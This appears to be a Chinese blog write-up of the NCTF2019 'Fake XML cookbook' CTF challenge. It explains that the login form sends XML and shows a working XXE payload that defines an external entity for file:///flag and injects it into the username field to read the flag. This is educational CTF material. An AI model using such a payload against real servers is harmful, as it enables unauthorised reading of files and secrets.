[NCTF2019]Fake XML cookbook

H3h3QAQ

于 2021-06-08 12:32:48 发布

阅读量106

点赞数

分类专栏： CTF 文章标签：安全

本文链接：https://blog.csdn.net/Anton__1/article/details/117697466

版权

CTF 专栏收录该内容

19 篇文章 1 订阅

订阅专栏

[NCTF2019]Fake XML cookbook

XML实体注入

原理参考https://www.freebuf.com/vuls/175451.html

学习链接https://xz.aliyun.com/t/6887#toc-2

看题目可知是XXE攻击

抓一下包

客户端向服务器发送XML数据

我们抓包可以控制整个数据，添加一个恶意代码，进行攻击

抓包看到 username和password都是xml格式

我们来构造payload来试着读取flag

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

拿到flag：

总的来说，这道题还算是挺简单的

H3h3QAQ

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[NCTF2019]Fake XML cookbook

[NCTF2019]Fake XML cookbookXML实体注入原理参考https://www.freebuf.com/vuls/175451.html学习链接https://xz.aliyun.com/t/6887#toc-2看题目可知是XXE攻击抓一下包客户端向服务器发送XML数据我们抓包可以控制整个数据，添加一个恶意代码，进行攻击抓包看到 username和password都是xml格式我们来构造payload来试着读取flag<?xml version="1.0"
复制链接

扫一扫